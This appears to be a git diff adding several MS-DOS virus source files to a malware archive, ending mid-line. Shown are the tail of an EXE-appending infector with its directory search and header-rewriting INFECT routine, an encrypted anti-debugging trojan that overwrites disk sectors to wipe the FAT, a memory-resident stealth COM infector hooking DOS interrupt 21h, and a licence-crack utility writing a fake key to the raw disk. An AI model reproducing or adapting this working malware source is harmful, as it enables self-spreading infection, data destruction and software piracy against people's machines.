+ inc [LEVEL] ;increment the level counter before exit + pop di ;strip any path or file spec off of original + xor al,al ;directory path + stosb +FBE1: mov al,1 ;return with NZ set + or al,al + ret + +FBE2: pop di ;successful exit, pull this off the stack +FBE3: xor al,al ;and set Z + ret ;exit + +;-------------------------------------------------------------------------- +;Third Level - Part A - Find an EXE file +; +;This function searches the path in USEFILE for an EXE file which passes +;the test FILE_OK. This routine will return the full path of the EXE file +;in USEFILE, and the c flag reset, if it is successful. Otherwise, it will return +;with the c flag set. It will search a whole directory before giving up. +; +FINDEXE: + mov dx,OFFSET DTA1 ;set new DTA for EXE search + mov ah,1AH + int 21H + mov di,OFFSET USEFILE + mov si,OFFSET EXEFILE + call CONCAT ;set up USEFILE with '\dir\*.EXE' + push di ;save position of '\' before '*.EXE' + mov dx,OFFSET USEFILE + mov cx,3FH ;search first for any file + mov ah,4EH + int 21H +NEXTEXE: + or al,al ;is DOS return OK? + jnz FEC ;no - quit with C set + pop di + inc di + stosb ;truncate '\dir\*.EXE' to '\dir\' + mov di,OFFSET USEFILE + mov si,OFFSET DTA1+1EH + call CONCAT ;setup file name '\dir\filename.exe' + dec di + push di + call FILE_OK ;yes - is this a good file to use? + jnc FENC ;yes - valid file found - exit with c reset + mov ah,4FH + int 21H ;do find next + jmp SHORT NEXTEXE ;and go test it for validity + +FEC: ;no valid file found, return with C set + pop di + mov BYTE PTR [di],0 ;truncate \dir\filename.exe to \dir + stc + ret +FENC: ;valid file found, return with NC + pop di + ret + + +;-------------------------------------------------------------------------- +;Third Level - Part B - Find a subdirectory +; +;This function searches the file path in USEFILE for subdirectories, excluding +;the subdirectory header entries. If one is found, it returns with Z set, and +;if not, it returns with NZ set. +;There are two entry points here, FIRSTDIR, which does the search first, and +;NEXTDIR, which does the search next. +; +FIRSTDIR: + call GET_DTA ;get proper DTA address in dx (calculated from LEVEL) + push dx ;save it + mov ah,1AH ;set DTA + int 21H + mov dx,OFFSET USEFILE + mov cx,10H ;search for a directory + mov ah,4EH ;do search first function + int 21H +NEXTD1: + pop bx ;get pointer to search table (DTA) + or al,al ;successful search? + jnz NEXTD3 ;no, quit with NZ set + test BYTE PTR [bx+15H],10H ;is this a directory? + jz NEXTDIR ;no, find another + cmp BYTE PTR [bx+1EH],'.' ;is it a subdirectory header? + jne NEXTD2 ;no - valid directory, exit, setting Z flag + ;else it was dir header entry, so fall through to next +NEXTDIR: ;second entry point for search next + call GET_DTA ;get proper DTA address again - may not be set up + push dx + mov ah,1AH ;set DTA + int 21H + mov ah,4FH + int 21H ;do find next + jmp SHORT NEXTD1 ;and loop to check the validity of the return + +NEXTD2: + xor al,al ;successful exit, set Z flag +NEXTD3: + ret ;exit routine + +;-------------------------------------------------------------------------- +;Return the DTA address associated to LEVEL in dx. This is simply given by +;OFFSET DTA2 + (LEVEL*2BH). Each level must have a different search record +;in its own DTA, since a search at a lower level occurs in the middle of the +;higher level search, and we don't want the higher level being ruined by +;corrupted data. +; +GET_DTA: + mov dx,OFFSET DTA2 + mov al,2BH + mul [LEVEL] + add dx,ax ;return with dx= proper dta offset + ret + +;-------------------------------------------------------------------------- +;Concatenate two strings: Add the asciiz string at DS:SI to the asciiz +;string at ES:DI. Return ES:DI pointing to the end of the first string in the +;destination (or the first character of the second string, after moved). +; +CONCAT: + mov al,byte ptr es:[di] ;find the end of string 1 + inc di + or al,al + jnz CONCAT + dec di ;di points to the null at the end + push di ;save it to return to the caller +CONCAT2: + cld + lodsb ;move second string to end of first + stosb + or al,al + jnz CONCAT2 + pop di ;and restore di to point to end of string 1 + ret + + +;-------------------------------------------------------------------------- +;Function to determine whether the EXE file specified in USEFILE is useable. +;if so return nc, else return c +;What makes an EXE file useable?: +; a) The signature field in the EXE header must be 'MZ'. (These +; are the first two bytes in the file.) +; b) The Overlay Number field in the EXE header must be zero. +; c) There must be room in the relocatable table for NUMRELS +; more relocatables without enlarging it. +; d) The word VIRUSID must not appear in the 2 bytes just before +; the initial CS:0000 of the test file. If it does, the virus +; is probably already in that file, so we skip it. +; +FILE_OK: + call GET_EXE_HEADER ;read the EXE header in USEFILE into EXE_HDR + jc OK_END ;error in reading the file, so quit + call CHECK_SIG_OVERLAY ;is the overlay number zero? + jc OK_END ;no - exit with c set + call REL_ROOM ;is there room in the relocatable table? + jc OK_END ;no - exit + call IS_ID_THERE ;is id at CS:0000? +OK_END: ret ;return with c flag set properly + +;-------------------------------------------------------------------------- +;Returns c if signature in the EXE header is anything but 'MZ' or the overlay +;number is anything but zero. +CHECK_SIG_OVERLAY: + mov al,'M' ;check the signature first + mov ah,'Z' + cmp ax,WORD PTR [EXE_HDR] + jz CSO_1 ;jump if OK + stc ;else set carry and exit + ret +CSO_1: xor ax,ax + sub ax,WORD PTR [EXE_HDR+26];subtract the overlay number from 0 + ret ;c is set if it's anything but 0 + +;-------------------------------------------------------------------------- +;This function reads the 28 byte EXE file header for the file named in USEFILE. +;It puts the header in EXE_HDR, and returns c set if unsuccessful. +; +GET_EXE_HEADER: + mov dx,OFFSET USEFILE + mov ax,3D02H ;r/w access open file + int 21H + jc RE_RET ;error opening - C set - quit without closing + mov [HANDLE],ax ;else save file handle + mov bx,ax ;handle to bx + mov cx,1CH ;read 28 byte EXE file header + mov dx,OFFSET EXE_HDR ;into this buffer + mov ah,3FH + int 21H +RE_RET: ret ;return with c set properly + +;-------------------------------------------------------------------------- +;This function determines if there are at least NUMRELS openings in the +;current relocatable table in USEFILE. If there are, it returns with +;carry reset, otherwise it returns with carry set. The computation +;this routine does is to compare whether +; ((Header Size * 4) + Number of Relocatables) * 4 - Start of Rel Table +;is >= than 4 * NUMRELS. If it is, then there is enough room +; +REL_ROOM: + mov ax,WORD PTR [EXE_HDR+8] ;size of header, paragraphs + add ax,ax + add ax,ax + sub ax,WORD PTR [EXE_HDR+6] ;number of relocatables + add ax,ax + add ax,ax + sub ax,WORD PTR [EXE_HDR+24] ;start of relocatable table + cmp ax,4*NUMRELS ;enough room to put relocatables in? +RR_RET: ret ;exit with carry set properly + + +;-------------------------------------------------------------------------- +;This function determines whether the word at the initial CS:0000 in USEFILE +;is the same as VIRUSID in this program. If it is, it returns c set, otherwise +;it returns c reset. +; +IS_ID_THERE: + mov ax,WORD PTR [EXE_HDR+22] ;Initial CS + add ax,WORD PTR [EXE_HDR+8] ;Header size + mov dx,16 + mul dx + mov cx,dx + mov dx,ax ;cxdx = position to look for VIRUSID in file + mov bx,[HANDLE] + mov ax,4200H ;set file pointer, relative to beginning + int 21H + mov ah,3FH + mov bx,[HANDLE] + mov dx,OFFSET VIDC + mov cx,2 ;read 2 bytes into VIDC + int 21H + jc II_RET ;couldn't read - bad file - report as though ID is there so we dont do any more to this file + mov ax,[VIDC] + cmp ax,[VIRUSID] ;is it the VIRUSID? + clc + jnz II_RET ;if not, then virus is not already in this file + stc ;else it is probably there already +II_RET: ret + + +;-------------------------------------------------------------------------- +;This routine makes sure file end is at paragraph boundary, so the virus +;can be attached with a valid CS. Assumes file pointer is at end of file. +SETBDY: + mov al,BYTE PTR [FSIZE] + and al,0FH ;see if we have a paragraph boundary (header is always even # of paragraphs) + jz SB_E ;all set - exit + mov cx,10H ;no - write any old bytes to even it up + sub cl,al ;number of bytes to write in cx + mov dx,OFFSET FINAL ;set buffer up to point to end of the code (just garbage there) + add WORD PTR [FSIZE],cx ;update FSIZE + adc WORD PTR [FSIZE+2],0 + mov bx,[HANDLE] + mov ah,40H ;DOS write function + int 21H +SB_E: ret + +;-------------------------------------------------------------------------- +;This routine moves the virus (this program) to the end of the EXE file +;Basically, it just copies everything here to there, and then goes and +;adjusts the EXE file header and two relocatables in the program, so that +;it will work in the new environment. It also makes sure the virus starts +;on a paragraph boundary, and adds how many bytes are necessary to do that. +; +INFECT: + mov cx,WORD PTR [FSIZE+2] + mov dx,WORD PTR [FSIZE] + mov bx,[HANDLE] + mov ax,4200H ;set file pointer, relative to beginning + int 21H ;go to end of file + call SETBDY ;lengthen to a paragraph boundary if necessary + mov cx,OFFSET FINAL ;last byte of code + xor dx,dx ;first byte of code, DS:DX + mov bx,[HANDLE] ;move virus code to end of file being attacked with + mov ah,40H ;DOS write function + int 21H + mov dx,WORD PTR [FSIZE] ;find 1st relocatable in code (SS) + mov cx,WORD PTR [FSIZE+2] + mov bx,OFFSET REL1 ;it is at FSIZE+REL1+1 in the file + inc bx + add dx,bx + mov bx,0 + adc cx,bx ;cx:dx is that number + mov bx,[HANDLE] + mov ax,4200H ;set file pointer to 1st relocatable + int 21H + mov dx,OFFSET EXE_HDR+14 ;get correct old SS for new program + mov bx,[HANDLE] ;from the EXE header + mov cx,2 + mov ah,40H ;and write it to relocatable REL1+1 + int 21H + mov dx,WORD PTR [FSIZE] + mov cx,WORD PTR [FSIZE+2] + mov bx,OFFSET REL1A ;put in correct old SP from EXE header + inc bx ;at FSIZE+REL1A+1 + add dx,bx + mov bx,0 + adc cx,bx ;cx:dx points to FSIZE+REL1A+1 + mov bx,[HANDLE] + mov ax,4200H ;set file pointer to place to write SP to + int 21H + mov dx,OFFSET EXE_HDR+16 ;get correct old SP for infected program + mov bx,[HANDLE] ;from EXE header + mov cx,2 + mov ah,40H ;and write it where it belongs + int 21H + mov dx,WORD PTR [FSIZE] + mov cx,WORD PTR [FSIZE+2] + mov bx,OFFSET REL2 ;put in correct old CS:IP in program + add bx,1 ;at FSIZE+REL2+1 on disk + add dx,bx + mov bx,0 + adc cx,bx ;cx:dx points to FSIZE+REL2+1 + mov bx,[HANDLE] + mov ax,4200H ;set file pointer relavtive to start of file + int 21H + mov dx,OFFSET EXE_HDR+20 ;get correct old CS:IP from EXE header + mov bx,[HANDLE] + mov cx,4 + mov ah,40H ;and write 4 bytes to FSIZE+REL2+1 + int 21H + ;done writing relocatable vectors + ;so now adjust the EXE header values + xor cx,cx + xor dx,dx + mov bx,[HANDLE] + mov ax,4200H ;set file pointer to start of file + int 21H + mov ax,WORD PTR [FSIZE] ;calculate new initial CS (the virus' CS) + mov cl,4 ;given by (FSIZE/16)-HEADER SIZE (in paragraphs) + shr ax,cl + mov bx,WORD PTR [FSIZE+2] + and bl,0FH + mov cl,4 + shl bl,cl + add ah,bl + sub ax,WORD PTR [EXE_HDR+8] ;(exe header size, in paragraphs) + mov WORD PTR [EXE_HDR+22],ax;and save as initial CS + mov bx,OFFSET FINAL ;compute new initial SS + add bx,10H ;using the formula SSi=(CSi + (OFFSET FINAL+16)/16) + mov cl,4 + shr bx,cl + add ax,bx + mov WORD PTR [EXE_HDR+14],ax ;and save it + mov ax,OFFSET VIRUS ;get initial IP + mov WORD PTR [EXE_HDR+20],ax ;and save it + mov ax,STACKSIZE ;get initial SP + mov WORD PTR [EXE_HDR+16],ax ;and save it + mov dx,WORD PTR [FSIZE+2] + mov ax,WORD PTR [FSIZE] ;calculate new file size + mov bx,OFFSET FINAL + add ax,bx + xor bx,bx + adc dx,bx ;put it in ax:dx + add ax,200H ;and set up the new page count + adc dx,bx ;page ct= (ax:dx+512)/512 + push ax + mov cl,9 + shr ax,cl + mov cl,7 + shl dx,cl + add ax,dx + mov WORD PTR [EXE_HDR+4],ax ;and save it here + pop ax + and ax,1FFH ;now calculate last page size + mov WORD PTR [EXE_HDR+2],ax ;and put it here + mov ax,NUMRELS ;adjust relocatables counter + add WORD PTR [EXE_HDR+6],ax + mov cx,1CH ;and save data at start of file + mov dx,OFFSET EXE_HDR + mov bx,[HANDLE] + mov ah,40H ;DOS write function + int 21H + mov ax,WORD PTR [EXE_HDR+6] ;get number of relocatables in table + dec ax ;in order to calculate location of + dec ax ;where to add relocatables + mov bx,4 ;Location= (No in table-2)*4+Table Offset + mul bx + add ax,WORD PTR [EXE_HDR+24];table offset + mov bx,0 + adc dx,bx ;dx:ax=end of old table in file + mov cx,dx + mov dx,ax + mov bx,[HANDLE] + mov ax,4200H ;set file pointer to table end + int 21H + mov ax,WORD PTR [EXE_HDR+22] ;and set up 2 pointers: init CS = seg of REL1 + mov bx,OFFSET REL1 + inc bx ;offset of REL1 + mov WORD PTR [EXE_HDR],bx ;use EXE_HDR as a buffer to + mov WORD PTR [EXE_HDR+2],ax ;save relocatables in for now + mov ax,WORD PTR [EXE_HDR+22] ;init CS = seg of REL2 + mov bx,OFFSET REL2 + add bx,3 ;offset of REL2 + mov WORD PTR [EXE_HDR+4],bx ;write it to buffer + mov WORD PTR [EXE_HDR+6],ax + mov cx,8 ;and then write 8 bytes of data in file + mov dx,OFFSET EXE_HDR + mov bx,[HANDLE] + mov ah,40H ;DOS write function + int 21H + ret ;that's it, infection is complete! + +;-------------------------------------------------------------------------- +;This routine determines whether the reproduction code should be executed. +;If it returns Z, the reproduction code is executed, otherwise it is not. +;Currently, it only executes if the system time variable is a multiple of +;TIMECT. As such, the virus will reproduce only 1 out of every TIMECT+1 +;executions of the program. TIMECT should be 2^n-1 +;Note that the ret at SR1 is replaced by a NOP by SETSR whenever the program +;is run. This makes SHOULDRUN return Z for sure the first time, so it +;definitely runs when this loader program is run, but after that, the time must +;be an even multiple of TIMECT+1. +; +TIMECT EQU 0 ;Determines how often to reproduce (1/64 here) +; +SHOULDRUN: + xor ah,ah ;zero ax to start, set z flag +SR1: ret ;this gets replaced by NOP when program runs + int 1AH + and dl,TIMECT ;is it an even multiple of TIMECT+1 ticks? + ret ;return with z flag set if it is, else nz set + + +;-------------------------------------------------------------------------- +;SETSR modifies SHOULDRUN so that the full procedure gets run +;it is redundant after the initial load +SETSR: + mov al,90H ;NOP code + mov BYTE PTR SR1,al ;put it in place of RET above + ret ;and return + +;-------------------------------------------------------------------------- +;This routine sets up the new DTA location at DTA1, and saves the location of +;the initial DTA in the variable OLDDTA. +NEW_DTA: + mov ah,2FH ;get current DTA in ES:BX + int 21H + mov WORD PTR [OLDDTA],bx ;save it here + mov ax,es + mov WORD PTR [OLDDTA+2],ax + mov ax,cs + mov es,ax ;set up ES + mov dx,OFFSET DTA1 ;set new DTA offset + mov ah,1AH + int 21H ;and tell DOS where we want it + ret + +;-------------------------------------------------------------------------- +;This routine reverses the action of NEW_DTA and restores the DTA to its +;original value. +RESTORE_DTA: + mov dx,WORD PTR [OLDDTA] ;get original DTA seg:ofs + mov ax,WORD PTR [OLDDTA+2] + mov ds,ax + mov ah,1AH + int 21H ;and tell DOS where to put it + mov ax,cs ;restore ds before exiting + mov ds,ax + ret + +;-------------------------------------------------------------------------- +;This routine saves the original file attribute in FATTR, the file date and +;time in FDATE and FTIME, and the file size in FSIZE. It also sets the +;file attribute to read/write, and leaves the file opened in read/write +;mode (since it has to open the file to get the date and size), with the handle +;it was opened under in HANDLE. The file path and name is in USEFILE. +SAVE_ATTRIBUTE: + mov ah,43H ;get file attr + mov al,0 + mov dx,OFFSET USEFILE + int 21H + mov [FATTR],cl ;save it here + mov ah,43H ;now set file attr to r/w + mov al,1 + mov dx,OFFSET USEFILE + mov cl,0 + int 21H + mov dx,OFFSET USEFILE + mov al,2 ;now that we know it's r/w + mov ah,3DH ;we can r/w access open file + int 21H + mov [HANDLE],ax ;save file handle here + mov ah,57H ;and get the file date and time + xor al,al + mov bx,[HANDLE] + int 21H + mov [FTIME],cx ;and save it here + mov [FDATE],dx ;and here + mov ax,WORD PTR [DTA1+28] ;file size was set up here by + mov WORD PTR [FSIZE+2],ax ;search routine + mov ax,WORD PTR [DTA1+26] ;so move it to FSIZE + mov WORD PTR [FSIZE],ax + ret + +;-------------------------------------------------------------------------- +;Restore file attribute, and date and time of the file as they were before +;it was infected. This also closes the file +REST_ATTRIBUTE: + mov dx,[FDATE] ;get old date and time + mov cx,[FTIME] + mov ah,57H ;set file date and time to old value + mov al,1 + mov bx,[HANDLE] + int 21H + mov ah,3EH + mov bx,[HANDLE] ;close file + int 21H + mov cl,[FATTR] + xor ch,ch + mov ah,43H ;Set file attr to old value + mov al,1 + mov dx,OFFSET USEFILE + int 21H + ret + +FINAL: ;last byte of code to be kept in virus + +VSEG ENDS + + +;-------------------------------------------------------------------------- +;Virus stack segment + +VSTACK SEGMENT PARA STACK + db STACKSIZE dup (?) +VSTACK ENDS + + END VIRUS ;Entry point is the virus + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.intrview.asm b/MSDOS/Virus.MSDOS.Unknown.intrview.asm new file mode 100644 index 00000000..a12edd20 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.intrview.asm @@ -0,0 +1,82 @@ +; INTRVIEW.ASM -- Skywalker Trojan +; Created with Nowhere Man's Virus Creation Laboratory v1.00 +; Written by Serpico + +virus_type equ 3 ; Trojan Horse +is_encrypted equ 1 ; We're encrypted +tsr_virus equ 0 ; We're not TSR + +code segment byte public + assume cs:code,ds:code,es:code,ss:code + org 0100h + +start label near + +main proc near + call encrypt_decrypt ; Decrypt the virus + +start_of_code label near + +stop_tracing: mov cx,09EBh + mov ax,0FE05h ; Acutal move, plus a HaLT + jmp $-2 + add ah,03Bh ; AH now equals 025h + jmp $-10 ; Execute the HaLT + mov bx,offset null_vector ; BX points to new routine + push cs ; Transfer CS into ES + pop es ; using a PUSH/POP + int 021h + mov al,1 ; Disable interrupt 1, too + int 021h + jmp short skip_null ; Hop over the loop +null_vector: jmp $ ; An infinite loop +skip_null: mov byte ptr [lock_keys + 1],130 ; Prefetch unchanged +lock_keys: mov al,128 ; Change here screws DEBUG + out 021h,al ; If tracing then lock keyboard + + mov si,offset data00 ; SI points to data + mov ah,0Eh ; BIOS display char. function +display_loop: lodsb ; Load the next char. into AL + or al,al ; Is the character a null? + je disp_strnend ; If it is, exit + int 010h ; BIOS video interrupt + jmp short display_loop ; Do the next character +disp_strnend: + + mov ax,0002h ; First argument is 2 + mov cx,0010h ; Second argument is 16 + cli ; Disable interrupts (no Ctrl-C) + cwd ; Clear DX (start with sector 0) + int 026h ; DOS absolute write interrupt + sti ; Restore interrupts + + + mov ax,04C00h ; DOS terminate function + int 021h +main endp + +data00 db "C'mon now, trim that FAT! 1 and 2 and 3 and....",13,10,10,0 + +vcl_marker db "[VCL]",0 ; VCL creation marker + + +note db "Please wait, interview is load" + db "ing. You've been infected with" + db "the Skywalker Trojan. HaHaHa" + db "YoDa - AlLiAnCe" + +end_of_code label near + +encrypt_decrypt proc near + mov si,offset start_of_code ; SI points to code to decrypt + mov cx,(end_of_code - start_of_code) / 2 ; CX holds length +xor_loop: xor word ptr [si],06734h ; XOR a word by the key + inc si ; Do the next word + inc si ; + loop xor_loop ; Loop until we're through + ret ; Return to caller +encrypt_decrypt endp +finish label near + +code ends + end main \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.inv-evil.asm b/MSDOS/Virus.MSDOS.Unknown.inv-evil.asm new file mode 100644 index 00000000..3bea902d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.inv-evil.asm @@ -0,0 +1,331 @@ +; Virusname : Invisible Evil +; Virusauthor: Metal Militia +; Virusgroup : Immortal Riot +; Origin : Sweden +; +; It's a memory resident, stealth, infector of com files. +; It check for two nops a bit after the jmp to see if it's already +; infected or not, and to stealth it, it'll check the seconds. +; No destructive routine included in this version, perhaps to come(?) +; Um!.. well, enjoy Insane Reality issue #4! +; I think that's all for now, outa here.. +; +;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- +; INVISIBLE EVIL! +;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + +virus segment + assume cs:virus,ds:virus,es:nothing + + org 100h +start: db 0E9h,02,00,90h,90h ; Jmp to vstart + +vstart equ $ + call code_start ; call codie_startie +code_start: + pop si + sub si,offset code_start ; so we can use the lea command etc + jmp code_continue + + db ' Our past is ' ; Lil' poem (?) + db ' our future! ' ; of mine + +code_continue: + mov bp,si ; Now, put bp in si instead so bp's used + jmp load ; Jmp and go resident + +old_21 dd ? ; Old int21 interrupt saved here + +new_21: ; Our own, new one int21 + cmp ax,4b00h ; Is a file being executed + je exec1 ; If so, damn it! INFECT! + +dir_thang: + cmp ah,11h ; Find first + je hide_size ; Use stealth + cmp ah,12h ; Find next + je hide_size ; Use stealth + cmp ax,3030h ; Another copy trying to go resident? + jne do_old ; If not, do the old int21 thang + mov bx,3030h ; Show that we're already resident +do_old: jmp dword ptr cs:[(old_21-vstart)] ; Jmp old int21 +exec1: jmp exec ; Try to infect +do_dir: jmp dword ptr cs:[(old_21-vstart)] ; See do_old + ret ; But return back + +hide_size: + pushf + push cs + call do_dir ; get FCB (current) + cmp al,00h ; Is DIR being used (?) + jz undocumented_get_FCB ; If so, go on + jmp dir_error ; If not, get the fuck + ; outa this place man +undocumented_get_FCB: + push ax ; push + push bx ; push + push es ; push (gaak! no pops) + mov ah,51h ; get FCB (location) + int 21h ; figure it out + mov es,bx ; get FCB (info) + cmp bx,es:[16h] ; check it + je fix_it_up ; if so, move on + jmp not_inf + +fix_it_up: + mov bx,dx ; fixup + mov al,[bx] ; some + push ax ; shit + mov ah,2fh ; get the DTA + int 21h ; yeah, you do that + pop ax ; atlast, pop me babe + inc al ; check FCB (extended) + jz add_it ; ok, move on + jmp normal_fcb ; jmp normal_fcb + +add_it: + add bx,7h ; yes, add it.. go ahead +normal_fcb: + mov ax,es:[bx+17h] + and ax,1fh + xor al,01h ; are the file's seconds + jz go_on_and_do_it_strong ; equal to "2"? + jmp not_inf ; If so, outa here + +go_on_and_do_it_strong: + and byte ptr es:[bx+17h],0e0h ; subtract the size + sub es:[bx+1dh],(vend-vstart) ; how much? (*.*) + sbb es:[bx+1fh],ax ; yet another stealthed +not_inf:pop es ; we will.. + pop bx ; we will.. + pop ax ; pop you! pop you! + +dir_error: + iret ; return to the one who + ; called this thang +exec: + push ax ; push the stuff needed + push bx ; (as normally) + push cx + push dx + push di + push si + push ds + push es + +infect: + mov ax,3d02h ; Open the file being + int 21h ; executed do that! + jc fuckitall ; If error, get the fuck + ; out! + + xchg ax,bx ; or.. mov bx,ax + + push ds ; pusha + push cs ; push + pop ds ; pop! + + mov ah,3fh ; Read from file + mov dx,(buffer-vstart) ; put in our buffer + mov cx,5h ; how much to read + int 21h ; do that + jc fuckitall ; If error, fuck it! + + + cmp word ptr cs:[(buffer-vstart)],5A4Dh ; Is it an .EXE? + je fuckitall ; If so, outa here.. + + cmp word ptr cs:[(buffer-vstart)],4D5Ah ; The other form? + je fuckitall ; (can be MZ or ZM) + ; If so, outa here + cmp word ptr cs:[(buffer-vstart)+3],9090h ; Ok, is it + je fuckitall ; infect? If so, + ; outa here + jmp next ; Move on.. + +fuckitall: + jmp homey2 ; Something screwed, + ; outa dis thang.. +next: + + mov ax,5700h ; Get date/time + int 21h ; int me baaaabe! + + mov word ptr cs:[(old_time-vstart)],cx ; save time + mov word ptr cs:[(old_date-vstart)],dx ; save date + + mov ax,4202h ; ftpr to end + mov cx,0 ; get ftpr (filesize) + cwd ; or.. xor dx,dx + int 21h + jc fuckitall ; if error, fuck it! + mov cx,ax ; mov cx to ax + sub cx,3 ; for the jmp + jmp save_rest_of_len + db ' [INVISIBLE EVIL!] (c) Metal Militia/Immortal Riot ' + +save_rest_of_len: + mov word ptr cs:[(jump_add+1-vstart)],cx ; save jmp length + + mov ah,40h ; write to file + mov cx,(vend-vstart) ; the virus + cwd ; from start + int 21h ; atlast the fun part + jnc fpointer ; no error(s), go on + jc homey ; fuck it! + +fpointer: + mov ax,4200h ; move file pointer + mov cx,0 ; to the beginning + cwd + int 21h + + + mov ah,40h ; write the JMP the + mov cx, 5 ; the file (5 bytes) + mov dx,(jump_add-vstart) ; offset jump thang + int 21h + + jc homey ; if error, fuck it! + + mov ax,5701h ; restore old + mov word ptr cx,cs:[(old_time-vstart)] ; date/time + mov word ptr dx,cs:[(old_date-vstart)] + + and cl,0e0H ; chance the file's + inc cl ; seconds to "2" for + int 21h ; stealth "marker" + + + mov ah,3eh ; close thisone + int 21h + + +homey: jmp homey2 ; outa here + db ' Dedicated to all the victims.. ' ; dedication note + +homey2: pop ds ; pop + pop es ; pop + pop ds ; pop + pop si ; pop + pop di ; pop + pop dx ; pop + pop cx ; pop + pop bx ; pop + pop ax ; new virus-name + ; popcorn virus? + jmp dword ptr cs:[(old_21-vstart)] ; heading for old + ; int21 +old_date dw 0 ; date/time +old_time dw 0 ; saving place + + +buffer: db 0cdh,20h,00 ; our lil' buffer +buffer2 db 0,0 ; plus these two +jump_add: db 0E9h,00,00,90h,90h; ; what we put instead + ; of org. jmp +exit2: jmp exit ; get outa here + +load: mov ax,3030h ; Are we already in + int 21h ; this users memory + cmp bx,3030h ; well, check it! + je exit2 ; if so, outa here + + +dec_here: + push cs ; push + pop ds ; pop + + mov ah,4ah ; req. very much mem + mov bx,0ffffh ; ret's largest size + int 21h + + mov ah,4ah ; ok, so now we + sub bx,(vend-vstart+15)/16+1 ; subtract the size of + jnc intme ; of our virus. If no + jmp exit2 ; error go on, else + ; fuck it +intme: + int 21h ; int me! int me! + + mov ah,48h + mov bx,(vend-vstart+15)/16 ; req. last pages + int 21h ; allocate to the virus + jnc decme ; no error, go on + jmp exit2 ; les get outa dis place + +decme: + dec ax ; oh? a dec, no push/pop + ; how glad i am :) + push es ; blurk! yet another push + + mov es,ax ; set es to ax + jmp dos_own ; carry on comrade + db ' Greets to B-real!/IR ' ; greetings to our + ; latest member, a +dos_own: ; friend of mine + mov byte ptr es:[0],'Z' ; this memory will + mov word ptr es:[1],8 ; have DOS as it's + ; owner + inc ax ; opposite of dec, eh? + ; yet another new-commer + lea si,[bp+offset vstart] ; copy to memory + mov di,0 ; (new block) xor di,di + jmp copy_rest ; go on + db ' It''s like this and like that and like thisena ' ; lil' + +copy_rest: + mov es,ax ; es as ax + mov cx,(vend-vstart+5)/2 ; the whole thing + cld ; bytes, clr direction + rep movsw + jmp make_res ; now, make it resident + db ' It''s like that and like this and like thatena '; thang + +make_res: + xor ax,ax ; atlast! + mov ds,ax ; put all shit to memory + push ds ; don't push me around :) + lds ax,ds:[21h*4] ; vectorswapping + jmp swap_sect ; (manually!) + db ' It''s like this.. ' ; by Snoop 'n Dre. + +swap_sect: + mov word ptr es:[old_21-vstart],ax ; where's our old int21 + mov word ptr es:[old_21-vstart+2],ds ; stored? well see here + pop ds + mov word ptr ds:[21h*4],(new_21-vstart) ; point to our virus + mov ds:[21h*4+2],es ; instead of old21 + + push cs ; no cmt. + pop ds ; to much 'bout 'em + ; today, eh? :) + +exit: + push cs ; no cmt. + pop es ; see above + + mov cx,5 ; five bytes + jmp copyback ; keep on moving.. + db ' Love to Lisa! ' ; To the girl i love +copyback: + mov si,offset buffer ; copy back org. jmp + add si,bp ; and run the org. proggy + jmp movdi_it ; yeah, les do that + db ' All i ever wanted.. ' ; Lisa, the one and only + +movdi_it: + mov di,100h ; di = 100h + repne movsb + jmp lastshit ; atlast, soon the end + db ' All i ever asked for.. ' ; Love in eternality! + +lastshit: + mov bp,100h ; bp equ 100h + jmp bp ; jmp to bp (SOF) + + +vend equ $ ; end of virus + +virus ends + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.inv602-r.asm b/MSDOS/Virus.MSDOS.Unknown.inv602-r.asm new file mode 100644 index 00000000..5ea1211c --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.inv602-r.asm @@ -0,0 +1,86 @@ +; +; InVircible v6.02 Registrator, (c)1995 ûirogen +; +; This little utility simply installs InVircible's registration key onto +; your hard drive. It is located on the last sector of the first cylinder +; and is designated by the word 48A5h residing at the end of the sector. +; After installing this, all current and future copies of InVircible installed +; on that hard drive will be registered, or licenced rather. +; + +segment cseg + assume cs: cseg, ds: cseg, es: cseg, ss: cseg + +cr equ 0ah +lf equ 0dh + +org 100h +start: + lea dx,intro ; display intro / prompt + call disp +get_y_n: + mov ah,8 ; make sure the user wants to + int 21h + cmp al,'Y' + jz yes + cmp al,'y' + jz yes + cmp al,'N' + jz no + cmp al,'n' + jz no + jmp get_y_n +yes: + call disp_al + mov dh,1 + mov cx,1 + call read_sec ; read boot sector + mov dh,0 + mov cx,word ptr sec_buf[18h] ; get cylinder per sector + call read_sec ; read last sector of cyl 0 + mov word ptr sec_buf[1FEh],0A548h ; throw word + mov ax,0301h ; write new sector to disk + int 13h + lea dx,done_msg + jmp exit +no: + call disp_al + lea dx,abort_msg +exit: + call disp + ret + + +read_sec: + mov ax,0201h + lea bx,sec_buf + mov dl,80h + int 13h + + ret +disp: + mov ah,9 + int 21h + ret + +disp_al: + mov dl,al + mov ah,2 + int 21h + ret + +intro: + db cr,lf,' ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿' + db cr,lf,' ³ InVircible v6.02 Registrator, (c)1995 ûirogen [NuKE] ³' + db cr,lf,' ³ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄij' + db cr,lf,' ³ Please distribute all over the known universe ³' + db cr,lf,' ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ' + db cr,lf,' WARNING: This software is about to make changes to the last sector' + db cr,lf,' of cylinfer 0, head 0 of your hard drive. It is unlikely that any' + db cr,lf,' problems will arise, but be cautious.' + db cr,lf,' Do you wish to continue [Y/N]? $' +done_msg db cr,lf,cr,lf, ' InVircible Registrator Complete!$' +abort_msg db 